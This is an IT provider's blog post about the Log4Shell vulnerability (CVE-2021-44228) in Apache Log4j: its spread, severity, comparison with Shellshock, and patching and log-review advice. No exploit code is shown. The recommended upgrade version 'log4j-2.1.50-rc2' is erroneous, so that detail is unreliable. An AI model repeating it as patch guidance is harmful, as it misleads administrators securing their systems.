An easy to exploit flaw in the Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE), which could lead to complete server takeover.
The flaw first appeared last week on, of all things, websites related to the one of the most popular games in the world, Minecraft. The sites warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.
Before long, the as-yet-unpatched flaw was dubbed “Log4Shell” by researchers, before being tracked as CVE-2021-44228. Then, another group of researchers added that it was seeing attacks on its honeypots coming from the Tor criminal network as threat actors tried to exploit the new bug,
Researchers added that this problem could cause an internet meltdown, given that Log4j is incorporated into lots of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. This exposes a number of third-party apps that may also be vulnerable to the same type of high-severity exploits as those spotted in Minecraft, as well as cloud services such as Apple iCloud.
Even though an initial fix was rushed out at the end of last week, this will take time to trickle down to all of the various projects, given how extensively the logging library is incorporated with them downstream.
An example of the bug’s massive reach is the National Security Agency (NSA), who commented that even the NSA’s GHIDRA – a suite of reverse engineering tools – includes the buggy Log4j library.
“The Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks.
The bug has been assigned the maximum CVSS score of 10, given how easy it is to exploit, the attackers’ ability to seize control of targeted servers and how common Log4j is. According to researchers, the hole in security can be exploited by simply logging a special string.
Security experts added: “This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.”
Some are already comparing this scenario to that of Shellshock, with regards to its huge potential severity. Also known as Bashdoor, Shellshock was a family of security bugs in the Unix Bash shell, present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its disclosure in 2014, Shellshock was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.
Security researchers have predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data. “Organisations are already seeing signs of exploitation in the wild, which means adversaries will just spray-and-pray across the internet – hoping for some luck.”
It is recommended that organisations that are actively using Apache log4j upgrade to log4j-2.1.50-rc2 as soon as possible. Vulnerability also depends on specific configurations. But there are “other attack vectors targeting this vulnerability which can result in Remote Control Execution. Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload.”
Businesses can tell if they’re affected by examining log files for services using affected Log4j versions. If they contain user-controlled strings they could be affected. By adopting an assumed breach mentality and reviewing logs for impacted applications for unusual activity, organisations can keep on top of this evolving situation.
Neuways advises businesses who are concerned by the flaw to contact their software providers to ensure that patches have been applied and all software their business is using is secure, as well as contacting their MSP. Some businesses may have CRM or accounting software that isn’t managed by their MSP, so it is important that all bases are covered to ensure complete safety.